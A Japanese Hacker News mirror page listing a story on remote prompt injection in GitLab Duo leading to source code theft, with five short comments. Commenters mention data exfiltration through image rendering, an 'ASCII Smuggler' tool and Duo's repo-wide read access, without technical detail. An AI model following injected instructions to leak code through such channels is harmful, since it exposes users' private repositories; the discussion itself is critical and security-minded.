TE
テックエコー
ホーム24時間トップ最新ベスト質問ショー求人
GitHubTwitter
ホーム

テックエコー

Next.jsで構築されたテクノロジーニュースプラットフォームで、グローバルなテクノロジーニュースとディスカッションを提供します。

GitHubTwitter

ホーム

ホーム最新ベスト質問ショー求人

リソース

HackerNews APIオリジナルHackerNewsNext.js

© 2025 テックエコー. すべての権利を保有。

Remote Prompt Injection in Gitlab Duo Leads to Source Code Theft

37 ポイント投稿者: chillax2日前

5 comments

cedws2日前
Until prompt injection is fixed, if it is ever, I am not plugging LLMs into anything. MCPs, IDEs, agents, forget it. I will stick with a simple prompt box when I have a question and do whatever with its output by hand after reading it.
评论 #44071876 未加载
wunderwuzzi231日前
Great work!<p>Data leakage via untrusted third party servers (especially via image rendering) is one of the most common AI Appsec issues and it&#x27;s concerning that big vendors do not catch these before shipping.<p>I built the ASCII Smuggler mentioned in the post and documented the image exfiltration vector on my blog as well in past with 10+ findings across vendors.<p>GitHub Copilot Chat had a very similar bug last year.
nusl2日前
GitLab&#x27;s remediation seems a bit sketchy at best.
评论 #44071508 未加载
mdaniel2日前
Running Duo as a system user was crazypants and I&#x27;m sad that GitLab fell into that trap. They already have personal access tokens so even if they had to silently create one just for use with Duo that would be a marked improvement over giving an LLM read access to every repo in the platform
aestetix1日前
Does that mean Gitlab Duo can run Doom?